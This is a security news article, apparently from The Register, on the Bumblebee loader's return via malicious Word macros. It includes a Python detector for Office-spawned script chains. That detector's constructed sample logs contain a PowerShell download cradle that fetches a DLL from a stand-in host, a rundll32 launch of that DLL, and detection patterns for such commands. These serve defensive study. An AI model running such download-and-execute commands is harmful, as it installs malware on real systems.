Bumblebee malware wakes from hibernation, forgets what year it is, attacks with macros
Trying to break in with malicious Word documents? How very 2015 of you
The Bumblebee malware loader seemingly vanished from the internet last October, but it's back and - oddly - relying on a vintage vector to try to gain access.
First spotted in 2022 by researchers at Proofpoint – who identified it as an apparent replacement for BazarLoader – Bumblebee was originally used by high-profile ransomware groups including Russia-linked Conti.
Now it has been spotted buzzing back to life. But it's using a "significantly different" attack chain this time – relying on malicious VBA macros, of all things, which suggests it might not be in the hands of the same skilled operators who created it.
This latest Bumblebee campaign has been targeting organizations in the US with emails using the subject line "Voicemail February" and sent from info@quarlesaa.com.
The quarlesaa domain appears to belong to an actual business, which is reflected in the sample email lure included in the report. We've asked the owner whether it is aware that its email system is being used to send malicious emails, but haven't heard back.
The email contains a link to a OneDrive URL hosting a Microsoft Word document. The doc is entirely unrelated to the sender – the sample shows a mission statement for Humane, developer of an AI-powered pin – but it has the malicious macro embedded within.
It's been more than a year since Microsoft updated its products to block VBA macros in files from the internet by default, in a bid to cut off their use as a malicious attack vector. As Proofpoint itself noted last May, the cyber criminal ecosystem underwent a "monumental shift" after Redmond's decision – quickly moving to different types of attacks.
Not so this latest campaign, which puts it at odds with other Bumblebee flights. Out of nearly 230 uses of Bumblebee since March 2022, Proofpoint said only five campaigns used macros – four of which relied on XL4 in Excel, while just one relied on VBA.
The rest of the intrusion attempts have used more evolved tactics – like malicious DLLs, HTML smuggling to drop RAR files, LNK files and zipped VBS attachments. Those are more akin to tactics Exotic Lily – an initial access broker tracked by Google's Threat Analysis Group – was using with Bumblebee in 2022.
If, somehow, a victim's system had macros re-enabled and this Bumblebee chain managed to trigger – which Proofpoint told The Register it hasn't actually seen in the wild – the macro would write a script to the Windows temp directory and run it; that script in turn ran a series of PowerShell commands to download and execute the Bumblebee DLL.
"We cannot say what the follow-on payload would be in this campaign, however historically Proofpoint has previously observed Bumblebee dropping Cobalt Strike, shellcode, and Sliver among other malware," Proofpoint senior threat intelligence analyst Selena Larson told us in an emailed statement.
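The chain described above (Word writes a script to %TEMP%, the script runs PowerShell to fetch a DLL, the DLL is executed) leaves a recognisable process tree on the endpoint. The following is an added detection example, not code from Proofpoint's report or from Bumblebee itself: it walks Sysmon-style process-creation events, flags script hosts and DLL loaders that descend from an Office application, and annotates each hit with the indicators the article mentions. The event records, PIDs, paths, user name and URL below are constructed for illustration; the field names follow Sysmon Event ID 1, but the logic works on any source that gives image, parent image, PID, parent PID and command line.

```python
"""Flag Office-spawned script hosts that stage a script in %TEMP%, run a
PowerShell download cradle, or load a DLL via rundll32/regsvr32.

Added example for this article; not Proofpoint's or Bumblebee's code.
All event data below is constructed (hostnames, PIDs, paths, URL).
"""
import ntpath
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
# Script or payload staged in a temp directory, as the report describes.
TEMP_PATH = re.compile(r"\\(?:AppData\\Local\\Temp|Windows\\Temp)\\", re.I)
# Common PowerShell download-and-execute primitives.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bIEX\b|"
    r"Invoke-Expression|Start-BitsTransfer|Net\.WebClient", re.I)
# A DLL being handed to a living-off-the-land loader.
DLL_EXEC = re.compile(r"\b(?:rundll32|regsvr32)(?:\.exe)?\b.*\.dll", re.I)
MAX_DEPTH = 4  # how many generations to climb looking for an Office ancestor


def _name(image):
    return ntpath.basename(image).lower()


def office_ancestor(event, by_pid):
    """Return the Office image name found in the parent chain, or None."""
    parent_name = _name(event["ParentImage"])
    if parent_name in OFFICE_APPS:
        return parent_name
    cur = event
    for _ in range(MAX_DEPTH - 1):
        cur = by_pid.get(cur["ParentProcessId"])
        if cur is None:  # parent not in the log window
            return None
        if _name(cur["Image"]) in OFFICE_APPS:
            return _name(cur["Image"])
    return None


def find_macro_chains(events):
    """Return one alert per script host / DLL loader descended from Office."""
    by_pid = {e["ProcessId"]: e for e in events}
    alerts = []
    for e in events:
        name = _name(e["Image"])
        if name not in SCRIPT_HOSTS:
            continue
        ancestor = office_ancestor(e, by_pid)
        if ancestor is None:
            continue
        cmd = e.get("CommandLine", "")
        reasons = [f"office_ancestor:{ancestor}"]
        if TEMP_PATH.search(cmd):
            reasons.append("temp_path")
        if DOWNLOAD_CRADLE.search(cmd):
            reasons.append("download_cradle")
        if DLL_EXEC.search(cmd):
            reasons.append("dll_exec")
        alerts.append({"pid": e["ProcessId"], "image": name, "reasons": reasons})
    return alerts


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
# Constructed Sysmon Event ID 1 records: one malicious chain plus two benign
# children that must not fire (Word printing, an admin's own PowerShell).
SAMPLE_EVENTS = [
    {"ProcessId": 1204, "ParentProcessId": 1, "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe", "CommandLine": "explorer.exe"},
    {"ProcessId": 4120, "ParentProcessId": 1204, "Image": WORD,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\Voicemail February.docm"'},
    {"ProcessId": 4310, "ParentProcessId": 4120, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": WORD,
     "CommandLine": r"cmd.exe /c C:\Users\alice\AppData\Local\Temp\update.bat"},
    {"ProcessId": 4322, "ParentProcessId": 4310, "Image": PS,
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -nop -w hidden -c (New-Object Net.WebClient)"
                    r".DownloadFile('http://example.invalid/x.dat',"
                    r"'C:\Users\alice\AppData\Local\Temp\x.dll')"},
    {"ProcessId": 4330, "ParentProcessId": 4322, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": PS,
     "CommandLine": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\x.dll,#1"},
    {"ProcessId": 4400, "ParentProcessId": 4120, "Image": r"C:\Windows\splwow64.exe",
     "ParentImage": WORD, "CommandLine": "splwow64.exe 12288"},
    {"ProcessId": 5000, "ParentProcessId": 1204, "Image": PS,
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe Get-ChildItem C:\Users\alice\Documents"},
]

if __name__ == "__main__":
    for alert in find_macro_chains(SAMPLE_EVENTS):
        print(alert)
```

Climbing several generations matters because the macro rarely launches PowerShell directly; a cmd.exe or wscript.exe hop in between is exactly what a parent-only rule misses. The `MAX_DEPTH` cap keeps the walk bounded on noisy logs, and the benign Word child (the print spooler helper) is ignored because only script hosts and DLL loaders are candidates in the first place.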
This one should be easy to spot
Indicators of compromise are included in the report on this Bumblebee resurgence campaign. But let's be realistic – such an outmoded attack shouldn't be a threat anymore, not to mention the mish-mash of themes in the email and the very basic malicious attachment.
"The URL in the email went to a document that was not related to a voicemail theme, which may appear unusual or possibly malicious to an end user," Larson told us. "Organizations should train users to recognize potentially suspicious activity based on commonly observed themes and lures, and report to security teams when observed."
Beyond that, the usual advice of keeping Windows and Microsoft Office installations up to date applies, as does making sure macros remain disabled by default and checking that none of your savvier users have taken it upon themselves to re-enable them.
Unsurprisingly, Proofpoint doesn't attribute this campaign to a tracked threat actor – even though the voicemail lure, use of OneDrive, and sender email address align with previous activity from the North Korean-aligned TA579, which has been behind previous Bumblebee campaigns.
Regardless of this threat, Proofpoint said Bumblebee's return is indicative of a surge in threat actor activity so far in 2024. Even if this campaign is a bit janky, they won't all be.
"Proofpoint researchers continue to observe new, creative attack chains, attempts to bypass detections, and updated malware from many threat actors and unattributed threat clusters," it warned. "Researchers are expecting this high operational tempo to continue until the anticipated summer threat actor breaks." ®